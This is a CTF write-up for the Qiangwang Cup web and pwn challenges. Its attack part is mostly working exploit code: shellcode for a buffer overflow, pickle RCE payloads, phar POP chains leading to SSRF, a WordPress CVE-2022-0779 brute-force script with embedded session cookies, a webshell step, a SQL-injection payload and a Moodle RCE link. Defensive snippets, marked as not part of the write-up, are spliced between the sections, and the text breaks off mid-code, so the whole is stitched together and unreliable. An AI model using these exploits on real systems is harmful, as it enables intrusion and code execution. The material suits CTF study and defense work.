Qiangwang Cup (强网杯) WriteUp | Qiangwang Vanguard (强网先锋) & Web

admin, 2025-01-06 13:23:07

Qiangwang Vanguard (强网先锋)
  • rcefile

www.zip leaks the source.
The extension blacklist is missing phar; the unintended solution is to upload a .phar, which is parsed directly as PHP.
(screenshots)
  • polydiv

# Solve script for polydiv. It runs under SageMath: the `R.<x> = Zmod(2)[]` line is Sage syntax.
# The commented-out proof_of_work() is the author's pwntools mbruteforce version of the loop below.
# def proof_of_work(sh):
#     sh.recvuntil("XXXX+")
#     suffix = sh.recvuntil(')').decode("utf8")[:-1]
#     log.success(suffix)
#     sh.recvuntil("== ")
#     cipher = sh.recvline().strip().decode("utf8")
#     proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() == cipher,
#                         string.ascii_letters + string.digits, length=4, method='fixed')
#     sh.sendlineafter("Give me XXXX: ", proof)

import itertools
import string
from Crypto.Util.number import *
from hashlib import *
from pwn import *

HOST, PORT = "HOST", 0   # placeholders: the challenge address is not given in the write-up
sh = remote(HOST, PORT)

# proof of work: find the 4-character XXXX with sha256(XXXX + suffix) == cipher
sh.recvuntil("XXXX+")
suffix = sh.recvuntil(')').decode("utf8")[:-1]
log.success(suffix)
sh.recvuntil("== ")
table = string.ascii_letters + string.digits
cipher = sh.recvline().strip().decode("utf8")
for cand in itertools.product(table, repeat=4):
    x = "".join(cand)
    if sha256((x + suffix).encode()).hexdigest() == cipher:
        proof = x
        log.success(proof)
        sh.sendlineafter("Give me XXXX: ", proof)
        break

# 40 rounds: read r(x), a(x), c(x) over GF(2) and answer b(x) = (r(x) - c(x)) / a(x)
R.<x> = Zmod(2)[]
for _ in range(40):
    sh.recvuntil("r(x) = ")
    rx = eval(sh.recvuntil(b"\n")[:-1].replace(b"^", b"**"))
    sh.recvuntil("a(x) = ")
    ax = eval(sh.recvuntil(b"\n")[:-1].replace(b"^", b"**"))
    sh.recvuntil("c(x) = ")
    cx = eval(sh.recvuntil(b"\n")[:-1].replace(b"^", b"**"))
    sh.recvuntil("b(x) = ")
    sh.sendline(str((rx - cx) / ax))

sh.interactive()
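The solve script above leaves all of the polynomial arithmetic to SageMath's Zmod(2)[x]. As an added example (not part of the write-up), here is the same GF(2)[x] division in plain Python, so the per-round computation b(x) = (r(x) - c(x)) / a(x) can be run and checked without Sage. Polynomials are stored as integers (bit i is the coefficient of x^i), which makes addition and subtraction a single XOR. The textual form "x^5 + x^2 + 1" is an assumption taken from the script's replacement of "^" before eval.

```python
# Added example, not from the write-up: GF(2)[x] arithmetic in plain Python.
# A polynomial is an int whose bit i is the coefficient of x^i; in GF(2) addition
# and subtraction are both XOR, so (r - c) is simply r ^ c.
# The text format ("x^5 + x^2 + 1") is an assumption based on the "^" handling in the script.

def gf2_mul(a: int, b: int) -> int:
    """Carry-less multiplication of two GF(2)[x] polynomials."""
    result = 0
    while b:
        if b & 1:
            result ^= a
        a <<= 1
        b >>= 1
    return result

def gf2_divmod(num: int, den: int):
    """Long division in GF(2)[x]; returns (quotient, remainder) with deg(rem) < deg(den)."""
    if den == 0:
        raise ZeroDivisionError("division by the zero polynomial")
    den_deg = den.bit_length() - 1
    quot, rem = 0, num
    while rem and rem.bit_length() - 1 >= den_deg:
        shift = (rem.bit_length() - 1) - den_deg   # align the leading terms
        quot ^= 1 << shift
        rem ^= den << shift                        # subtract (= add) the aligned divisor
    return quot, rem

def parse_poly(text: str) -> int:
    """'x^5 + x^2 + 1' -> 0b100101. Terms are x^k, x, or 1, joined by '+'."""
    value = 0
    for term in text.replace(" ", "").split("+"):
        if term == "1":
            value ^= 1
        elif term == "x":
            value ^= 1 << 1
        elif term.startswith("x^"):
            value ^= 1 << int(term[2:])
        else:
            raise ValueError(f"unexpected term {term!r}")
    return value

def format_poly(value: int) -> str:
    """Inverse of parse_poly, highest degree first."""
    terms = []
    for i in range(value.bit_length() - 1, -1, -1):
        if (value >> i) & 1:
            terms.append("1" if i == 0 else "x" if i == 1 else f"x^{i}")
    return " + ".join(terms) if terms else "0"

def solve_round(r_text: str, a_text: str, c_text: str) -> str:
    """One challenge round: given r = a*b + c, recover b = (r - c) / a by exact division."""
    rx, ax, cx = parse_poly(r_text), parse_poly(a_text), parse_poly(c_text)
    quot, rem = gf2_divmod(rx ^ cx, ax)
    if rem:
        raise ValueError("a(x) does not divide r(x) - c(x): inputs are inconsistent")
    return format_poly(quot)
```

Because division here is exact, a non-zero remainder means the three polynomials were misread (for example a trailing carriage return left in the line), which is the usual reason a script like the one above silently sends wrong answers.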

  • ASR

# Challenge source, as given (kept commented out by the author):
# from Crypto.Util.number import getPrime
# from secret import flag
# pad = lambda s: s + bytes([(len(s)-1)%16+1]*((len(s)-1)%16+1))
#
# n = getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2 * getPrime(128)**2
# e = 3
#
# flag = pad(flag)
# print(flag)
# assert(len(flag) >= 48)
# m = int.from_bytes(flag,'big')
# c = pow(m,e,n)
#
# print(f'n = {n}')
# print(f'e = {e}')
# print(f'c = {c}')

from functools import reduce
from Crypto.Util.number import *
from sympy import *

# The variable names n, e, c, d and m were lost in extraction; they are restored from how the values are used below.
n = 8250871280281573979365095715711359115372504458973444367083195431861307534563246537364248104106494598081988216584432003199198805753721448450911308558041115465900179230798939615583517756265557814710419157462721793864532239042758808298575522666358352726060578194045804198551989679722201244547561044646931280001
e = 3
c = 945272793717722090962030960824180726576357481511799904903841312265308706852971155205003971821843069272938250385935597609059700446530436381124650731751982419593070224310399320617914955227288662661442416421725698368791013785074809691867988444306279231013360024747585261790352627234450209996422862329513284149
# the four 128-bit primes: n is the square of their product
P1 = 223213222467584072959434495118689164399
P2 = 218566259296037866647273372633238739089
P3 = 260594583349478633632570848336184053653
P4 = 225933944608558304529179430753170813347
assert n == (P1*P2*P3*P4)**2

# e = 3 is invertible modulo phi(P1^2 * P3^2), so that part decrypts as ordinary RSA
phi = (P3-1)*(P1-1)*P3*P1
print(GCD(e, phi))
d = inverse(e, phi)

# For P2 and P4 the cube roots were taken with sympy's nthroot_mod (all roots):
# m2 = nthroot_mod(c,3,P2,True)
# print(m2)
# m2 = nthroot_mod(c,3,P4,True)
# print(m2)

m = 50285288042907373014089492494812223136212714158049271523227438161885132141972   # residue modulo P1*P3 (value as pasted by the author)
m1s = [536612649025125756442163498276399907554017009972585088360569997378772209006159183122833201520722281740271702531008]   # root(s) from nthroot_mod, as pasted
m2s = [439729196038496827809903608178394603448413205552544947252133292886704218379697828969479259149226856141068289169207]   # root(s) from nthroot_mod, as pasted

def CRT(ai, mi):
    """Chinese remainder theorem: combine residues ai modulo pairwise-coprime moduli mi."""
    assert (reduce(GCD, mi) == 1)
    assert (isinstance(mi, list) and isinstance(ai, list))
    M = reduce(lambda x, y: x * y, mi)
    ai_ti_Mi = [a * (M // m) * inverse(M // m, m) for (m, a) in zip(mi, ai)]
    return reduce(lambda x, y: x + y, ai_ti_Mi) % M

for m1 in m1s:
    for m2 in m2s:
        try:
            print(long_to_bytes(CRT([int(m1), int(m2), m], [int(P2), int(P4), int(P1*P3)])))
        except Exception as err:
            print(str(err))

  • WP-UM

CVE-2022-0779
https://wpscan.com/vulnerability/9d4a3f09-b011-4d87-ab63-332e505cf1cd
The challenge is about this CVE. It only lets you tell whether a given file exists on the server, which is not much on its own, but combined with the challenge hint: the username and password are stored under /username and /password in the server root, named according to the rule in the screenshot:
(screenshot)
With this vulnerability the username and password can be brute-forced one character at a time. Note that a new user has to be registered first, and the nonce is taken from the captured upload request:
(screenshot)
PoC:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com
Cookie: wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1
Content-Type: application/x-www-form-urlencoded
Content-Length: 159

field_name=test&filepath=/../../../../../../../../username/1M&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=1d833af826&is_ajax=true

If the file exists, the response contains "Remove", as shown:
(screenshot)
Script based on this:
import requests

tables = r'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_{}-'
url = "http://eci-2ze7r7wnzasxlkt9i15e.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php"
headers = {
    'Cookie': 'wordpress_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7Cb8fd9fb9bdedaff6d5a4880dd894993f7a52f07de0828302dde18f18b6b2f9ce; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1658212074,1658628132,1659144034; wordpress_logged_in_1a2fb3faa043b8a7518c85a26e639a75=cnm%7C1659359913%7CjGNVlbPkqjs6Yfr8VqU4f9Grn7wVF9yTi6OYoO4kuGC%7C9ebbfce6203217cd1cae1cc6dba7c268674cbdf4003af9f9623dc7548ae197f1'
}
flag = ""
# position by position: the file "<index><char>" exists only for the correct character
for i in range(1, 16):
    for t in tables:
        data = {
            'field_name': 'test',
            'filepath': '/../../../../../../../../password/%s' % (str(i) + t),
            'field_id': 'um_field_4',
            'form_key': 'Upload',
            'action': 'um_show_uploaded_file',
            'pf_nonce': '1d833af826',
            'is_ajax': 'true',
        }
        print(str(i) + t)
        r = requests.post(url, data=data, headers=headers)
        if "Remove" in r.text:
            flag = flag + t
            print(flag)
            break
This yields the username and password: MaoGePaMaoMaoGeYaoQiFeiLa
(screenshot)
Log in to the admin panel and write a webshell from the theme editor:
(screenshot)
Search for files modified in the last 100 minutes: find / -type f -mmin -100
(screenshot)
Reading it gives the flag.
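The `filepath` parameter above works as a file-existence oracle because the plugin joins it under its upload directory without checking that the result stays inside. As an added example (not part of the write-up or the plugin), this is the containment check a file-handling endpoint needs; the upload directory is a constructed placeholder and the check itself is generic.

```python
# Added example, not from the write-up: reject any user-supplied name that escapes the base
# directory. UPLOAD_BASE is a placeholder; the check does not depend on it.
import os
from pathlib import Path

UPLOAD_BASE = Path("/var/www/html/wp-content/uploads/um")   # placeholder base directory

def resolve_upload_path(user_supplied: str, base: Path = UPLOAD_BASE) -> Path:
    """Join a user-controlled name under `base` and raise ValueError if it escapes."""
    if "\x00" in user_supplied:
        raise ValueError("NUL byte in path")
    base_norm = os.path.normpath(str(base))
    # A leading slash makes os.path.join discard `base`, so strip it first.
    candidate = os.path.normpath(os.path.join(base_norm, user_supplied.lstrip("/\\")))
    # commonpath compares whole components, so "/var/www/html2" is not a child of "/var/www/html".
    if os.path.commonpath([base_norm, candidate]) != base_norm:
        raise ValueError(f"path escapes upload directory: {user_supplied!r}")
    return Path(candidate)

def is_allowed_upload_path(user_supplied: str) -> bool:
    """Boolean wrapper for logging or tests."""
    try:
        resolve_upload_path(user_supplied)
        return True
    except ValueError:
        return False
```

On a live filesystem, run `os.path.realpath` on the candidate before the `commonpath` comparison as well, otherwise a symlink placed inside the upload directory can still point outside it. Note that `normpath` clamps extra `..` at the root, which is exactly why eight `../` segments in the PoC resolve to `/username/1M` and fail the check.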
  • devnull

from pwn import *
context.log_level = True

io = process('./devnull')
#io = remote('182.92.161.17', 16302)
#gdb.attach(io, 'b *0x40145c')
#raw_input()

io.sendlineafter('filename', b'b' * 0x1f)

payload = b'a' * 0x14 + p64(0x3fe100) + p64(0x3fe118) + p64(0x401350)
io.sendafter('discard', payload)

# 27-byte execve("/bin/sh") shellcode; the backslash escapes were lost in extraction and are restored here
shellcode = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
payload = p64(0x3fe000)
payload += b'a' * 0x18 + p64(0x4012D0) + b'a' * 8 + p64(0x3fe138)
payload += shellcode
io.sendafter('data', payload)

io.sendline(b"/bin/sh\x00")
io.recvuntil(b"\n")
io.sendline(b"cat ./flag 1>&2")
io.interactive()

Web
  • babyweb

Looking at the source:
var ws = null;
var url = "ws://" + window.location.host + "/bot";
Commands are sent to the bot over WebSocket. It can change the admin password, so a CSRF-style page does that:
<script>
function wsk(){
    ws = new WebSocket("ws://127.0.0.1:8888/bot");
    ws.onopen = function(event){
        var msg = "changepw 123456";
        ws.send(msg);
    }
}
wsk();
</script>
Buy the hint to get the source. The purchase check is bypassed through the difference between how the Python and Go code parse JSON: a body that repeats the same key makes the purchase logic pass.
{
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":0},{"id":2,"num":1}]
}
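The bypass above depends on two parsers disagreeing about which copy of "product" counts. As an added example (not part of the write-up or the challenge code), the parser-side fix is to refuse documents with duplicate keys at the boundary instead of letting each component pick one silently. Python's `json.loads` takes an `object_pairs_hook` that sees every object's key/value pairs, nested objects included, so the check is a few lines; the sample body is the one quoted above.

```python
# Added example, not from the write-up: a strict JSON loader that rejects duplicate keys.
import json

SAMPLE_BODY = """{
"product":[{"id":1,"num":0},{"id":2,"num":0}],
"product":[{"id":1,"num":0},{"id":2,"num":1}]
}"""   # the body from the write-up

class DuplicateKeyError(ValueError):
    pass

def _no_duplicates(pairs):
    """object_pairs_hook: json calls this with every object's (key, value) list, nested ones too."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise DuplicateKeyError(f"duplicate key {key!r}")
        obj[key] = value
    return obj

def loads_strict(text: str):
    """Parse JSON, raising DuplicateKeyError on any repeated key in any object."""
    return json.loads(text, object_pairs_hook=_no_duplicates)

def has_duplicate_keys(text: str) -> bool:
    try:
        loads_strict(text)
        return False
    except DuplicateKeyError:
        return True

def default_view(text: str):
    """What json.loads does on its own: the last duplicate silently wins."""
    return json.loads(text)
```

Whichever side of a multi-service deployment does the authorization decision should be the side that parses strictly; rejecting the request there means it never matters what the other parser would have seen.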
  • easyweb

Looking at the source, there is a file-read endpoint:
<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交"><br>
    <a href="showfile.php?f=./demo.png">查看照片</a>
</form>

Direct file reads are not allowed:
<p class='tip'>no permission, you can only see string 'demo' and 'guest'</p>
Payload:
/showfile.php?f=demo/../../../../var/www/html/index.php
<form action="index.php" method="post" enctype="multipart/form-data">
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交"><br>
    <a href="showfile.php?f=./demo.png">查看照片</a>

<?php
    $upload = md5("2022qwb" . $_SERVER['REMOTE_ADDR']);
    @mkdir($upload, 0333, true);
    if (isset($_POST['submit'])) {
        include 'upload.php';
    }
?>

</form>

showfile.php
<?php
error_reporting(0);
require_once('class.php');
$filename = $_GET['f'];

if (preg_match("/http|https|bzip2|gopher|dict|zlib|data|input|%00/i", $filename)) {
    die("nop");
} else {
    if (isset($_SESSION)) {
        $show = new AdminShow($filename);
        $show->show();
    } else {
        if (preg_match('/guest|demo/i', $filename)) {
            $show = new GuestShow($filename);
            $show->show();
        } else {
            die("<p class='tip'>no permission, you can only see string 'demo' and 'guest'</p>");
        }
    }
}
?>

upload.php
<?php
error_reporting(0);
require_once('class.php');

if (isset($_SESSION)) {
    if (isset($_GET['fname']) ? !empty($_GET['fname']) : FALSE) {
        $_FILES["file"]["name"] = $_GET['fname'];
    }
    $upload = new Upload();
    $upload->upload();
} else {
    die("<p class='tip'>guest can not upload file</p>");
}
?>

class.php
<?php
class Upload {
    public $file;
    public $filesize;
    public $date;
    public $tmp;

    function __construct() {
        $this->file = $_FILES["file"];
    }

    function do_upload() {
        $filename = session_id() . explode(".", $this->file["name"])[0] . ".jpg";
        if (file_exists($filename)) {
            unlink($filename);
        }
        move_uploaded_file($this->file["tmp_name"], md5("2022qwb" . $_SERVER['REMOTE_ADDR']) . "/" . $filename);
        echo 'upload  ' . "./" . md5("2022qwb" . $_SERVER['REMOTE_ADDR']) . "/" . $this->e($filename) . ' success!';
    }

    function e($str) {
        return htmlspecialchars($str);
    }

    function upload() {
        if ($this->check()) {
            $this->do_upload();
        }
    }

    function __toString() {
        return $this->file["name"];
    }

    function __get($value) {
        $this->filesize->$value = $this->date;
        echo $this->tmp;
    }

    function check() {
        $allowed_types = array("jpg", "png", "jpeg");
        $temp = explode(".", $this->file["name"]);
        $extension = end($temp);
        if (in_array($extension, $allowed_types)) {
            return true;
        } else {
            echo 'Invalid file!';
            return false;
        }
    }
}

class GuestShow {
    public $file;
    public $contents;

    public function __construct($file) {
        $this->file = $file;
    }

    function __toString() {
        $str = $this->file->name;
        return "";
    }

    function __get($value) {
        return $this->$value;
    }

    function show() {
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64," . base64_encode($this->contents);
        echo "<img src={$src} />";
    }

    function __destruct() {
        echo $this;
    }
}

class AdminShow {
    public $source;
    public $str;
    public $filter;

    public function __construct($file) {
        $this->source = $file;
        $this->schema = 'file:///var/www/html/';
    }

    public function __toString() {
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }

    public function __get($value) {
        $this->show();
        return $this->$value;
    }

    public function __set($key, $value) {
        $this->$key = $value;
    }

    public function show() {
        if (preg_match('/usr|auto|log/i', $this->source)) {
            die("error");
        }
        $url = $this->schema . $this->source;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
        $src = "data:jpg;base64," . base64_encode($response);
        echo "<img src={$src} />";
    }

    public function __wakeup() {
        if ($this->schema !== 'file:///var/www/html/') {
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
            $this->source = 'admin.png';
        }
    }
}

The idea seems to be to build a POP chain that reaches the SSRF.
Guests are not allowed to upload; a cookie with name="PHP_SESSION_UPLOAD_PROGRESS" was added to get around that.
Build the POP chain:
<?php
class GuestShow {
    public $file;
    public $contents;
    public function __construct($file) {
        $this->file = $file;
    }
}

class AdminShow {
    public $source;
    public $str;
    public $filter;
    public function __construct($file) {
        $this->source = $file;
        $this->schema = 'file://';
    }
}

@unlink("test.phar");
$phar = new Phar("test.phar");                    // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");    // set the stub
$o = new GuestShow(new AdminShow("/proc/net/tcp"));
$phar->setMetadata($o);                           // store the custom object as manifest metadata
$phar->addFromString("test.txt", "test");         // add a file to the archive
$phar->stopBuffering();

Generate the phar and rename it demo.jpg. Once uploaded it bypasses the check, and admin.png can be read directly:
/showfile.php?f=phar://./xxxx/demo1.jpg
__wakeup has to be bypassed:
public function __wakeup() {
    if ($this->schema !== 'file:///var/www/html/') {
        $this->schema = 'file:///var/www/html/';
    }
    if ($this->source !== 'admin.png') {
        $this->source = 'admin.png';
    }
}
The SSRF URL is built as $url = $this->schema . $this->source;
Changing the property count in the serialized object bypasses __wakeup, but the phar then has to be re-signed:
from hashlib import sha1

file = open("test.phar", "rb").read()
text = file[:-28]           # everything before the signature block (20-byte SHA1 + 4-byte flags + "GBMB")
last = file[-8:]            # the last 8 bytes: signature flags and the GBMB magic
new_file = text + sha1(text).digest() + last   # rebuild the file so the SHA1 matches the modified content
open("demo7.jpg", "wb").write(new_file)
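Both the rcefile note (phar missing from an extension blacklist) and the demo.jpg trick here work because the upload check only looks at the file name. As an added example (not part of the write-up or the challenge code), here is an upload-time detector that looks at the bytes instead. It uses two fixed features of the phar layout that an extension check never sees: the `__HALT_COMPILER();` stub marker and the trailing `[signature][4-byte flags][GBMB]` block, whose hash covers everything before it (the same layout the re-signing script above patches). The sample archive in the test is constructed with a placeholder body; it is not a loadable manifest.

```python
# Added example, not from the write-up: detect phar archives disguised as images by content.
import hashlib
import struct

PHAR_MAGIC = b"GBMB"
STUB_MARK = b"__HALT_COMPILER();"
# signature flag value -> (hash name, digest length); these are the phar signature types
SIG_ALGOS = {0x0001: ("md5", 16), 0x0002: ("sha1", 20), 0x0004: ("sha256", 32), 0x0008: ("sha512", 64)}
IMAGE_MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def inspect_phar(data: bytes) -> dict:
    """Collect phar evidence without parsing the manifest: stub marker, GBMB trailer, and
    whether the embedded signature matches the content (None when there is no recognised trailer)."""
    info = {"has_stub": STUB_MARK in data, "has_trailer": data.endswith(PHAR_MAGIC),
            "sig_algo": None, "sig_valid": None}
    if info["has_trailer"] and len(data) >= 8:
        flags = struct.unpack("<I", data[-8:-4])[0]
        if flags in SIG_ALGOS:
            name, size = SIG_ALGOS[flags]
            if len(data) >= 8 + size:
                body, sig = data[:-(8 + size)], data[-(8 + size):-8]
                info["sig_algo"] = name
                info["sig_valid"] = hashlib.new(name, body).digest() == sig
    return info

def is_disguised_phar(data: bytes, claimed_ext: str) -> bool:
    """True when the upload should be rejected: it does not start with the magic of the claimed
    image type, or it carries phar markers anywhere (polyglot images included)."""
    magic = IMAGE_MAGIC.get(claimed_ext.lower().lstrip("."))
    looks_like_image = magic is not None and data.startswith(magic)
    evidence = inspect_phar(data)
    return (not looks_like_image) or evidence["has_stub"] or evidence["has_trailer"]

def build_sample_phar(stub: bytes, body: bytes) -> bytes:
    """Constructed test fixture in the phar layout with a SHA1 signature. The body is a
    placeholder rather than a real manifest, so PHP would not load it."""
    content = stub + body
    return content + hashlib.sha1(content).digest() + struct.pack("<I", 0x0002) + PHAR_MAGIC
```

The signature check is the forensic half: a valid signature over the file as stored tells you the archive was produced (or, as in the write-up, re-signed) by tooling rather than corrupted in transit. For upload handling the cheaper rule is enough: an image file has no business containing either marker.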

Reading /proc/net/tcp reveals 10.10.10.10:80, which hosts another SSRF:
<?php
// Internal resource reader - test machine
// See phpinfo.php for the configuration

highlight_file(__FILE__);

if (isset($_GET['url'])) {
    $link = $_GET['url'];
    $curlobj = curl_init();
    curl_setopt($curlobj, CURLOPT_POST, 0);
    curl_setopt($curlobj, CURLOPT_URL, $link);
    curl_setopt($curlobj, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($curlobj);
    curl_close($curlobj);

    echo $result;
}

if ($_SERVER['REMOTE_ADDR'] === '10.10.10.101' || $_SERVER['REMOTE_ADDR'] === '100.100.100.101') {
    system('cat /flag');
    die();
}

?>
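Both fetchers in this challenge fail the same way: showfile.php blocklists a few scheme names but lets file:// and phar:// through, and the internal reader hands `url` straight to curl. As an added example (not part of the write-up or the challenge code), this is the allowlist check a server-side fetcher needs: only http(s), no credentials in the URL, the host resolved by the fetcher itself and refused if any address is non-global, and the checked address returned so the caller connects to it rather than resolving the name again. The resolver is injectable so the test runs offline against a constructed name table.

```python
# Added example, not from the write-up: allowlist validation for a server-side URL fetcher.
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def system_resolver(host: str):
    """Default resolver: every address the system returns for the name."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})

def is_global_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    if addr.version == 6 and addr.ipv4_mapped is not None:   # ::ffff:10.0.0.1 is still 10.0.0.1
        addr = addr.ipv4_mapped
    # False for private, loopback, link-local, shared (100.64/10), unspecified and reserved space
    return addr.is_global

def validate_fetch_url(url: str, resolver=system_resolver):
    """Return the checked addresses for `url`, or raise ValueError. Connect to one of the
    returned addresses rather than resolving the name a second time (DNS rebinding)."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if parts.username or parts.password:
        raise ValueError("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("missing host")
    try:
        addresses = [str(ipaddress.ip_address(host))]   # literal IP: no lookup needed
    except ValueError:
        try:
            addresses = list(resolver(host))
        except Exception as exc:
            raise ValueError(f"cannot resolve {host!r}") from exc
    if not addresses:
        raise ValueError(f"no addresses for {host!r}")
    blocked = [ip for ip in addresses if not is_global_address(ip)]
    if blocked:
        raise ValueError(f"{host!r} resolves to non-global address(es): {blocked}")
    return addresses

def is_allowed_fetch_url(url: str, resolver=system_resolver) -> bool:
    try:
        validate_fetch_url(url, resolver)
        return True
    except ValueError:
        return False
```

A name that resolves to a mix of public and internal addresses is refused outright: the fetcher cannot control which one curl would pick, so the only safe answer is no.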

The second phar points the SSRF at the internal reader:
<?php
class GuestShow {
    public $file;
    public $contents;
    public function __construct($file) {
        $this->file = $file;
    }
}

class AdminShow {
    public $source;
    public $str;
    public $filter;
    public function __construct($file) {
        $this->source = $file;
        $this->schema = 'http://';
    }
}

@unlink("test.phar");
$phar = new Phar("test.phar");                    // the extension must be .phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");    // set the stub
$o = new GuestShow(new AdminShow("10.10.10.10:80/?url=file:///flag"));
$phar->setMetadata($o);                           // store the custom object as manifest metadata
$phar->addFromString("test.txt", "test");         // add a file to the archive
$phar->stopBuffering();

  • crash

The source is given. balancer deserializes with pickle and only filters R, which is easy to bypass (newlines in the payloads below are written as \n):
(S'whoami'\nios\nsystem\n.
The challenge description says the flag is on the 504 page.
The server runs behind nginx. A 504 is returned when nginx times out and closes the connection, but a sleep that is too long produces a 502 instead. So use several sleeps, so that the server never produces a 502 while the last request still exceeds nginx's request timeout and yields a 504.
Set the userdata cookie to the base64 of:
(cos\nsystem\nS'sleep 10'\no.
Send many requests at once; the last few come back with the 504 page.
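Filtering the R opcode does not help here because INST (`i`), GLOBAL (`c`) and OBJ (`o`) reach the same code paths without it. As an added example (not part of the write-up or the challenge code), here is the detection side: a static scanner that lists every opcode able to import or call code (pickletools parses the stream without executing anything), and a restricted loader whose `find_class` refuses all globals, the single chokepoint that GLOBAL, STACK_GLOBAL and INST all go through. The two payloads are the ones quoted above with their newlines restored; they are only scanned and refused, never executed.

```python
# Added example, not from the write-up: static pickle scanning plus a restricted loader.
import io
import pickle
import pickletools

PAYLOAD_INST = b"(S'whoami'\nios\nsystem\n."      # "i" (INST) reaches os.system without any R
PAYLOAD_OBJ = b"(cos\nsystem\nS'sleep 10'\no."     # "c" (GLOBAL) + "o" (OBJ), again no R

# opcodes that can import a global or call a callable during load
CODE_EXEC_OPCODES = {"GLOBAL", "STACK_GLOBAL", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX", "REDUCE", "BUILD"}

def dangerous_opcodes(payload: bytes) -> list:
    """List the code-execution-capable opcodes in a pickle, in stream order, without running it."""
    found = []
    try:
        for opcode, _arg, _pos in pickletools.genops(payload):
            if opcode.name in CODE_EXEC_OPCODES and opcode.name not in found:
                found.append(opcode.name)
    except Exception:            # truncated or malformed stream: treat as suspicious too
        found.append("M ALFORMED".replace(" ", ""))
    return found

class RestrictedUnpickler(pickle.Unpickler):
    """Refuses every global lookup, so only plain data (str, bytes, int, list, dict, ...) loads."""
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def safe_loads(payload: bytes):
    return RestrictedUnpickler(io.BytesIO(payload)).load()

def loads_or_none(payload: bytes):
    """Convenience wrapper: None instead of an exception for refused streams."""
    try:
        return safe_loads(payload)
    except pickle.UnpicklingError:
        return None
```

An application that must accept pickles from clients should do both: scan before loading so the attempt is logged, and load with a `find_class` that allows at most a short list of its own data classes. Substring filters on the opcode bytes are not a control at all.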
  • easylogin

wp_query SQL injection:
action=asssss&query_vars[tax_query][1][field]=term_taxonomy_id&query_vars[tax_query][1][include_children]=1&query_vars[tax_query][1][terms][1]=1)+or+updatexml(0x7e,concat(1,database()),0x7e)#
Inject into the site on port 8888 to get the password, but it could not be decrypted.
Port 8888 runs Moodle. After installing it locally and inspecting the database, the passwords could not be decrypted, but there is a table named mdl_sessions that stores sessions; another player's session can be taken from it to ride on their login.
(screenshot)
Searching GitHub turns up a related plugin, which gives RCE directly:
https://github.com/HoangKien1020/Moodle_RCE
domain/blocks/rce/lang/en/block_rce.php?cmd=id
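The tax_query payload above is an error-based injection, which leaves a clear mark in the request line. As an added example (not part of the write-up), here is a small detector run over constructed access-log lines in Combined format: every query parameter is URL-decoded twice before matching so single- and double-encoded values are treated alike, and the two rules cover error-based functions and a boolean clause closed off with a comment. The log lines and addresses are constructed for this example.

```python
# Added example, not from the write-up: flag error-based / boolean SQL injection attempts in access logs.
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
ERROR_BASED_FN = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)
BOOLEAN_TAIL = re.compile(r"\)\s*(or|and)\b.*(#|--|/\*)\s*$", re.IGNORECASE | re.DOTALL)

# constructed sample log; the first line carries the write-up's payload, URL-encoded as a server would log it
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2022:10:01:02 +0000] "POST /wp-admin/admin-ajax.php?action=asssss'
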